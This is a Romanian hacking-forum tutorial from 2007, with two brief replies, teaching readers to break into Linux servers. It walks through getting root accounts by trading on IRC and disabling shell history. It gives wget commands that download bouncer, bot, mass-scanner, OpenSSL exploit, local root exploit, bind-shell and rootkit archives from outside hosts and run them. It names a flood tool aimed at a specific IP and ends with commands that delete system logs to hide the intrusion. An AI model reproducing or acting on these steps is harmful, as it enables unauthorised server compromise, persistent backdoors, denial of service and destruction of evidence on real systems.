HACKING ZONE
Hacking Hack pentru Windows si Linux/Unix , hacking tools , cracking , virusi si produse antivirus , security sistem , free download produse software , troieni si antitroieni
|
Lista Forumurilor Pe Tematici
|
HACKING ZONE | Lista de useri | Reguli | Cauta | Inregistrare | Login
CHAT GENERAL | CHAT HACKINGZONE | POZE HACKINGZONE
Nu sunteti logat.
|
Nou pe simpatie.ro: riaalexa
|
Welcome in underground ! Stim cine esti , sti cine suntem , asa ca nu are rost sa ne ascundem !
|
|
Acest tutorial pe care il scriu acum e o creatie proprie...o sa mai gasiti cu gramezile pe net, dar vreu sa postez si eu unu aici daca nu deranjaza pe nimeni!Sa incepem!!
Ca sa faceti scann aveti nevoie prima data de un root, de unde il puteti procura? pai sunt cateva variante vedeti si voi care o sa mearga!1. va instalati voi un linux pe calculator si va bagati un scaner 2. intrati si voi pe IRC cum am facut eu mai demult si intrati pe un canal de trade cu root...bnc...chesti dinastea!va uitati si voi pe acolo pe canal shi vedeti care da root la schimb, intrati pe el la prv shi de aici conteaza mult sa va duca capul! i ziceti ca i dati voi ce vrea el acolo sau cel mai sigur ca dai si u root la schimb dai root de bnc-uri sau alceva shi ca vrei unu de scan, spui ca ai root cu user root , dar vrei ca el sa dea primul pentru ca u ai pierdut cateva degeaba ca te-au fraierit unu!! oke daca musca baiatul shi iti da... o sa iti dea ceva de genu 127.0.0.0 root:password, asta e doar un exemplu! aici root - e useru si password- e parola ce faceti cu ele va zic in continuare!! 3. il luati si voi de la un tovaras
precizez ca ce o sa scriu in continuare sunt comenzi care le folositi pe root!! cei care lucreaza de pe window au nevoie de putty(dati pe google) intrati in putty bagati ip-ul care vi l-a dat ala pe IRC si selectati port 22 SSh dati connect si o sa va apara ceva de genu user: bagati root (sau ce va dat ala acolo)si apoi apare password: si aici bagati password(ce va da ala acolo) oke acum sunteti pe root daca nu v-a tradus ala!!trebe sa schibati repede parola pt asta dati passwd , acum va cere parola veche o bagati si apoi va cere parola noua... puneti voi o parola mai grea acolo si aveti root
ACUM SA INCEP CU COMENZILE:
Sa zicem ca ai primit un root...ok....sa zicem ca ai intrat pe el cu user si pass si ca au mers;imediat dupa ce ai inntrat tre sa dai urmatoarele comenzi pt a nu salva anumite chestii pe care le faci pe root si astfel sa te vada adminu: unset HISTFILE unset HISTSAVE history -n unset WATCH export HISTFILE=/dev/null
COMENZI CU EXPLICATIE: w , uptime = arata de cate zile este serverul sus id, whoami = arata dreptul pe care il avem pe root: apache sau root ls, dir = arata continutul unui folder rm -rf = aterge un folder sau fisier Impachetez un fisier -> tar chf fisier.tar fisier -> tar zcd fisier.tar director Vad ip la un server -> ping -c1 yahoo.com /sbin/ipchains -A input --destination-port -p tcp -j REJECT route add -host ip-ul reject -> Inchid un port anume cat /proc/cpuinfo -> Informatii despre sistem rpm -Uhv arhiva -> despachetez arhiva rpm gzip -9 ex.tar -> modifik extensia tar in tar.gz /usr/sbin/useradd -o -u 0 http -> fak shell cat /etc/issue -> vad versiunea de linux gcc program.c -o program -> compilez un program df -h -> vad cat re hardu /etc/rc.d/init.d -> Afisate Pidurile cat /etc/hosts -> Vad Vhosturile netstat -aut -> VAd cine mai ii pe roata cat /etc/*release -> Vad versiunea de linux cat /etc/hosts -> Vad hosturile alias ls='dir --color=tty'-> Bag ls /usr/sbin/userdel user -> Sterg user find / -name ".. " -print -xdev ->caut foldere ascunse find / -name ".*" -print -xdev | cat -v ->caut foldere ascunse
DACA vreti sa va faceti BNC.. chesti dinastea pe el aveti in continuare comenzi si arhive: precizez ca arhivele sar putea sa nu mai mearga dar o sa gasiti pe net dati si voi pe google!!!!
Daca vreti sa va faceti bnc aveti aici comenzile necesare
wget www.yupy.3x.ro/psy.tgz (extrage pe root arhiva de bnc de pe un site) tar xzvf psy.tgz (despacheteaza arhiva) cd psybnc (intru in folderul bnc-ului) mv psybnc bash (mut executabilul de la bnc pe un executabil mai ascuns) pico psybnc.conf (editez portul de la bnc) export PATH="." ( fak sa dispara caracterele "." si "/" cand se da comanda ps -aux bash (pornesc bnc-ul)
si asa ai bnc admin pe portu care lai setat mai sus cu pico pe ip pe care ii rootu In caz ca nu aveti comanda "pico" folositi comanda "mc" ;ar fi mai multe dar is putin mai complikate , atunci cel mai bine luati arhiva de pico de aici: rpm -vhU --force ftp://ftp.rpmfind.net/linux/sourceforge ... 7.i386.rpm
Bun... acuma aveti bnc pe root-ul respectiv si sa zicem ca vreti sa aveti si un bot cu care sa va jucati pe mirc sau sa va protejati un canal De aici: wget www.geocities.com/fidel_ul/mek.tgz
Voi nu tre sa modifikati numai fisierul "mech.session" unde veti trece canalul unde vor intra botii prima data pe net si "emech.users" unde va puneti voi owner la boti si pe care host veti avea 100 - acces maxim la boti puteti modifika fisierele respective folosit Norton Comander sau pico de pe root-ul respectiv salvand arhiva dupa ce ati modifikato
Ok.....deja aveti si bot si bnc pe root... sa zicem ca mai vreti sal folositi sa aveti rooatele voastre fara sa fie primite de la cineva Atunci va trene un mass scanner de servere apache ;scanner pe care lam folosit si yo inainte sami prokur roote nu numai din scanat Il puteti lua de aici: wget www.yupy.3x.ro/atd.tgz tar zxvf atd.tgz rm -rf atd.tgz cd atd Acuma tre sa dati urmatoarele comenzi: ./mass -s 1000 ip -l x exemplu: ./mass -s 1000 217.129.*.* -l x
Dupa ce au trecut cateva minute bune (vreo 30 min si sa fiti gasit cel putin vreo 300 ip, ex (found: 384) il opriti cu comanda ctrl+c si dupa aia dati comanda: ./osslmass2 x Acuma asteptati pt a intra in servere.O sa arate cam asa ceva: Attacking: 213.203.196.185 : OpenSsl Exploit ... Folositi-l Pe Riscul Vostru by Silviu
Deschid 30 Conexiuni Stabilesc Conexiunea Ssl
: Incercare De Deschidere... Connection unexpectedly closed
Daca la vreun ip va arata: In Executie ... Conexiune Stabilita...Bravo ..Esti Hacer ;>> Inseamna ca ati intrat pe un server apache.... Atunci tre sa intrati intrun folder temporal;exemoplu /var/tmp sau /tmp Veti intra asa: cd /var/tmp Acolo veti lua o arhiva de exeploit local ca sa la puteti lua drept de root putanduva deschide un port cu user si parola De aici luati exploitul: wget www.x-type.go.ro/mirk/SSLROOT.GZ tar zxvf SSLROOT.GZ rm -rf SSLROOT.GZ ./sslroot Daca nu va arata din prima "U got a root shell" mai dati de cateva ori ./sslroot pina va apare ok... acuma sunteti pe root pe respectivul server(nu toate serverele va permite sa aveti acest drept) Acuma va puteti deschide un port pe 4000 ca sa puteti intra cand vreti pe el dupa ce ati terminat de scanat cu scanerul de pe care ati inrrat pe el wget http://www.geocities.com/ndg_ro/za.tgz tar zxvf za.tgz rm -rf za.tgz cd za ./zbind Dupe ce ati dat asta o sa aveti root fara user si pass doar ip pe serveru la care va zis aia cu bravo esti hacer pe port 400 Cel mai bine ar fi sa folositi un rk pt ca veti avea user root si parola care veo alegeti astfel ne putant intra nimeni care va stie ip-ul cum ar fi daca avea avea zbind pe el
wget haceri-in-actiune.info/rk.tar.gz tar zxvf rk.tar.gz rm -rf rk.tar.gz cd rk ./setup portul o sa fie: 6969 Dupa acestia veti avea root pe ip pe care ati bagat rk cu user:root si pass: ala care lati ales cand ati dat ./setup
Acuma tre sa va securizati rootul ca sa nu mai intre nimeni peste voi Cel mai simplu editati "httpd.conf" din /etc Cautati in fisierul respectiv unde apare "sslengine" Acolo o sa va apara "on" dar voi modifikati si puneti "off" dupa care dati comanda: service httpd reload
Hm... sa zicem ca vreti sal floodati pe cineva pt ca va suparat...aici aveti arhiva si comenzile sa terminati cu nemernikulP
wget r3dstorm.com/meg.tgz tar -xzf meg.tgz rm -rf meg.tgz cd meg/bin ./stealth ip port ex ./stealth 193.230.212.70 22
Acuma dupa ce ati fakut atatea chestii pe root tre sa va stergeti urma stergand urmatoarele fisiere:
rm -rf .bash_history rm -rf /var/run/utmp rm -rf /var/run/wtmp - rm -rf /var/log/lastlog rm -rf /usr/adm/lastlog rm -rf .bash_history cd /var/log/ rm -rf wtmp rm -rf secure rm -rf lastlog rm -rf messages touch messagess touch wtmp touch secure touch lastlog cd /root rm -rf .bash_history touch .bash_history
TOT CE AM SCRIS AICI FOLOSITI PE PROPRIA RASPUNDERE! 

_______________________________________ Traieshti ca sa inveti! Invata cat traieshti!
|
|
02-11-2007 17:29:42 |
|
|
am specificat ca arhivele sar putea sa nu mai mearga dar gasiti pe net destule!
_______________________________________ Traieshti ca sa inveti! Invata cat traieshti!
|
|
02-11-2007 21:14:01 |
|
|
sau poate au plecat si ei la masa ... ce sti!? 
_______________________________________ Traieshti ca sa inveti! Invata cat traieshti!
|
|
02-11-2007 21:14:45 |
|